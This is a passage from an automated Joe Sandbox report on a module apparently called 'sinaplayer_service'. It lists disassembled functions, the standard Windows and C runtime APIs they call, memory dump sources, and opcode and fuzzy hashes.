                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeFreeHeap
                                                                                                                                                                                                    • String ID: *\$y[
                                                                                                                                                                                                    • API String ID: 2148159843-1414595890
                                                                                                                                                                                                    • Opcode ID: 51fa9177da5b1c6c504a16a4793d31cac0e9805bc926ff499dcf257070ae60bf
                                                                                                                                                                                                    • Instruction ID: d8275c4dbe4f443f75bc758c7097ac470c9d3456e82008d0b1ca6366a21d4d32
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51fa9177da5b1c6c504a16a4793d31cac0e9805bc926ff499dcf257070ae60bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C72195B1D19212AFFF115F24F841B6E37B4FB0B368301042AE9A097151C7BB9942CBD4
                                                                                                                                                                                                    Function 6D0A6C80 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,00000000,?,?,?,?,6D0A6C6A), ref: 6D0A6C94
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(combase.dll,RoInitialize,?,?,?,?,6D0A6C6A), ref: 6D0A6CAD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0A6CB4
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(combase.dll,RoUninitialize,?,?,?,?,6D0A6C6A), ref: 6D0A6CD6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0A6CDD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6D0A6C6A), ref: 6D0D387A
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6D0A6C6A), ref: 6D0D3886
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,6D0A6C6A), ref: 6D0D389C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,6D0A6C6A), ref: 6D0D38AA
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D15CF40,?,?,?,?,?,6D0A6C6A), ref: 6D0D38B0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6D15CF40,?,?,?,?,?,6D0A6C6A), ref: 6D0D38BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorHandleLastModuleProc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionLibraryLoadThrow_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 885641006-3997890769
                                                                                                                                                                                                    • Opcode ID: 149f03248d7eaebc5d8690a0c977538eca38a90874c8aafc2351b0e119da5677
                                                                                                                                                                                                    • Instruction ID: a8f4031fc82cd8b97d315ed6e2e51bb0a448a1793c2106f1b15344be821f7a7f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 149f03248d7eaebc5d8690a0c977538eca38a90874c8aafc2351b0e119da5677
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30119874614382ABFF149BF5AC5873F77BCFB0A245B500429B516DA246EBB4C4009BB1
                                                                                                                                                                                                    Function 6D099BA4 Relevance: 24.2, APIs: 16, Instructions: 175COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_ValidateWrite@@YAHPAXI@Z.MSVCR120(00000000,00000001,6D099BE0,0000000C,6D099C33,?,?,00000000,00000000,6D099C58,00000008,6D099A04,?,?,?,00000000), ref: 6D099CF8
                                                                                                                                                                                                    • ?_ValidateWrite@@YAHPAXI@Z.MSVCR120(?,00000001,6D099BE0,0000000C,6D099C33,?,?,00000000,00000000,6D099C58,00000008,6D099A04,?,?,?,00000000), ref: 6D099D06
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000008,6D099BE0,0000000C,6D099C33,?,?,00000000,00000000,6D099C58,00000008,6D099A04,?,?,?,00000000), ref: 6D099D1E
                                                                                                                                                                                                    • ?_inconsistency@@YAXXZ.MSVCR120(6D099BE0,0000000C,6D099C33,?,?,00000000,00000000,6D099C58,00000008,6D099A04,?,?,?,00000000,6D0DB112), ref: 6D099D35
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ValidateWrite@@$?_inconsistency@@AdjustPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 105498407-0
                                                                                                                                                                                                    • Opcode ID: 3aee5aa8fc5d703ea74befc0eec5f68ffdd3a32989ec5b663196c14dea170134
                                                                                                                                                                                                    • Instruction ID: 13b5affb2e8ee7db9cfafd0dbc3d7e5eada37a2679f05cd9a9618a81d4121950
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3aee5aa8fc5d703ea74befc0eec5f68ffdd3a32989ec5b663196c14dea170134
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 155190766493075EFB198F65E891B7A37F8AF01325F21741DE9288F1E0EB22D482E611
                                                                                                                                                                                                    Function 6D09C722 Relevance: 24.2, APIs: 16, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$isleadbytembtowc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3580289129-0
                                                                                                                                                                                                    • Opcode ID: c77aea0dfa1fb6fd4f132ec76950e18999d1eca761c874c43910d6770d0d3357
                                                                                                                                                                                                    • Instruction ID: 6ac0dc00f26479242d44f0ed3bab9605aa4523d3f95395738583abe65bcb61b1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c77aea0dfa1fb6fd4f132ec76950e18999d1eca761c874c43910d6770d0d3357
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3951F57140C152BAE3054B789890B3EB7B4AF4B338765431AFA75CF1E1EB34D412A7A5
                                                                                                                                                                                                    Function 6D09448C Relevance: 24.1, APIs: 16, Instructions: 125COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D094523
                                                                                                                                                                                                    • free.MSVCR120(?,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D0A98B4
                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6D0A98BF
                                                                                                                                                                                                    • free.MSVCR120(?,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D0A98D2
                                                                                                                                                                                                    • ___free_lconv_num.LIBCMT ref: 6D0A98DD
                                                                                                                                                                                                    • free.MSVCR120(?,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D0A98E7
                                                                                                                                                                                                    • free.MSVCR120(?,?,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D0A98F2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$___free_lconv_mon___free_lconv_num
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2838340673-0
                                                                                                                                                                                                    • Opcode ID: 17ed0cd4c548806fad7c53a60b63b8c21513d5d5e4b974e3d60d2823ccaec3ff
                                                                                                                                                                                                    • Instruction ID: efbb74c8a70ef666982f66f6dfbe7c06dde05e5b47d2b7203329d99294cbf00c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17ed0cd4c548806fad7c53a60b63b8c21513d5d5e4b974e3d60d2823ccaec3ff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA41A271608703AFFF214EB8D841B6A73E4FF06394F55482AE168CF152EB36E840D654
                                                                                                                                                                                                    Function 6D091995 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 116threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtFlsGetValue.MSVCR120(6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0919C6
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,000003BC,00000008,6D091A5F,?,00000001,?), ref: 6D0919D7
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,00000008,6D091A5F,?,00000001,?), ref: 6D0919EF
                                                                                                                                                                                                    • _initptd.MSVCR120(00000000,00000000,6D091A5F,?,00000001,?), ref: 6D091A00
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000D), ref: 6D091C41
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000C), ref: 6D091C62
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D091A07
                                                                                                                                                                                                    • __freeptd.LIBCMT ref: 6D091BE9
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACAA6
                                                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 6D0ACD71
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091A5F,?,00000001,?), ref: 6D0D3B99
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CommandLineValue__crt_lock$CurrentThread__freeptd_calloc_crt_initptdfree
                                                                                                                                                                                                    • String ID: 0'Z
                                                                                                                                                                                                    • API String ID: 1616718619-2320578061
                                                                                                                                                                                                    • Opcode ID: fd3c963aea369190bdee8e317e8108eaac485fb53d5ce27b06a9f1279e205a29
                                                                                                                                                                                                    • Instruction ID: 089292afe2b959b602e64f00875c61d011afebf8545b767c199c0605a49b5dd6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd3c963aea369190bdee8e317e8108eaac485fb53d5ce27b06a9f1279e205a29
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7310635A5D303AAFB116BF5580036E36F8BF0736CF92411AEA20DB182EF71C5419666
                                                                                                                                                                                                    Function 6D145C5D Relevance: 22.7, APIs: 15, Instructions: 179COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __dexp_ldtest$Cbuild_cimag_creal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1450283889-0
                                                                                                                                                                                                    • Opcode ID: 44148f16633e31d324123ad184d9f41a5aaf9c082e5354c6c7855fab9a2bd03a
                                                                                                                                                                                                    • Instruction ID: 38b7a12a68bf49f29b429fe11342baf3913d966936b1cab10bf6200264387464
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44148f16633e31d324123ad184d9f41a5aaf9c082e5354c6c7855fab9a2bd03a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B551B075C0881AD6EF01BB94E84D6FEBB78FF45304F828885E6D136088DFB105788795
                                                                                                                                                                                                    Function 6D1458D2 Relevance: 22.7, APIs: 15, Instructions: 179COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __dexp_dtest$Cbuild_cimag_creal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2547048650-0
                                                                                                                                                                                                    • Opcode ID: 5fd88cd3b464680a0152d396f19832b5650c0e36257eb1e315c76225ca94732e
                                                                                                                                                                                                    • Instruction ID: 994026b1f06cb129ce6cd496f52b2f8fd44f2fa616c3438b7a2ac68125c39a78
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fd88cd3b464680a0152d396f19832b5650c0e36257eb1e315c76225ca94732e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07519F71C1881ED6EF01BB94E8496FEBB78FF49314F928885E6C136088EBB255748395
                                                                                                                                                                                                    Function 6D0F7E5C Relevance: 21.2, APIs: 14, Instructions: 221windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0F7E9E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15D0DC), ref: 6D0F7EB3
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F7EC0
                                                                                                                                                                                                    • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCMT ref: 6D0F7F15
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F7F50
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F7F98
                                                                                                                                                                                                      • Part of subcall function 6D094872: TlsGetValue.KERNEL32(?,6D0948CA,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D09488E
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000048,?), ref: 6D0F7FCC
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7484,6D15CEB0), ref: 6D0F7FE1
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,6D0E7484,6D15CEB0), ref: 6D0F8006
                                                                                                                                                                                                    • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120(00000048,?,6D15D0DC), ref: 6D0F8061
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F8081
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000000,?,00000048,?,6D15D0DC), ref: 6D0F8091
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@$Base::CancellationConcurrency::details::ContextVisible$ExceptionTaskThrow$Abort@_Base::_CollectionCollection@details@Concurrency::details::_Concurrency@@H_prolog3_catchStateStructuredTokenValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1204123976-0
                                                                                                                                                                                                    • Opcode ID: 2df69d85c0012566e3d6b495d99b0d791f02ca0615f444f2a4aca20b30861678
                                                                                                                                                                                                    • Instruction ID: b76f28ce25472f3818df55a5a9a6c6cf70e038f46f19005a1bd88d3795f9632e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2df69d85c0012566e3d6b495d99b0d791f02ca0615f444f2a4aca20b30861678
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D81AEB0A0460A9FEB14CF66C484BAEF7F4FF48304B60852EE96697651C734E916CF91
                                                                                                                                                                                                    Function 6D092F6E Relevance: 21.2, APIs: 14, Instructions: 189COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(?,00000000,00000000,?,7FFFFFFF,6D0930E8,00000020), ref: 6D092F98
                                                                                                                                                                                                      • Part of subcall function 6D092F50: _mbstowcs_s_l.MSVCR120(?,?,?,?,?,00000000), ref: 6D092F64
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(?,00000002), ref: 6D092FAD
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(00000000,00000000,?,?,00000000), ref: 6D092FCA
                                                                                                                                                                                                    • _wsetlocale.MSVCR120(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D092FDF
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: _getptd.MSVCR120(6D0933E8,00000014,6D092FE4,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D0932D3
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: _calloc_crt.MSVCR120(000000B8,00000001), ref: 6D0932F0
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: _lock.MSVCR120(0000000C), ref: 6D093306
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: __copytlocinfo_nolock.LIBCMT ref: 6D093317
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: wcscmp.MSVCR120(00000000,6D15F880,00000000,00000000,00000000), ref: 6D093351
                                                                                                                                                                                                      • Part of subcall function 6D0932B8: _lock.MSVCR120(0000000C,00000000,00000000,00000000), ref: 6D093368
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D092FE8
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • _getptd.MSVCR120(00000000,00000000,00000000), ref: 6D092FFB
                                                                                                                                                                                                    • _wcstombs_s_l.MSVCR120(00000000,00000000,00000000,?,00000000,?,00000000), ref: 6D093022
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(-00000004,?,?,?,?,?,?,00000000), ref: 6D093039
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • _wcstombs_s_l.MSVCR120(00000000,00000004,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 6D093060
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D093075
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0930BA
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0E0092
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D0E00B1
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D0E00FB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_lock$_calloc_crt_getptd_mbstowcs_s_wcstombs_s_l$CriticalEnterFreeHeapSection__copytlocinfo_nolock_invoke_watson_malloc_crt_mbstowcs_s_l_wsetlocalemallocwcscmp
                                                                                                                                                                                                    • String ID:
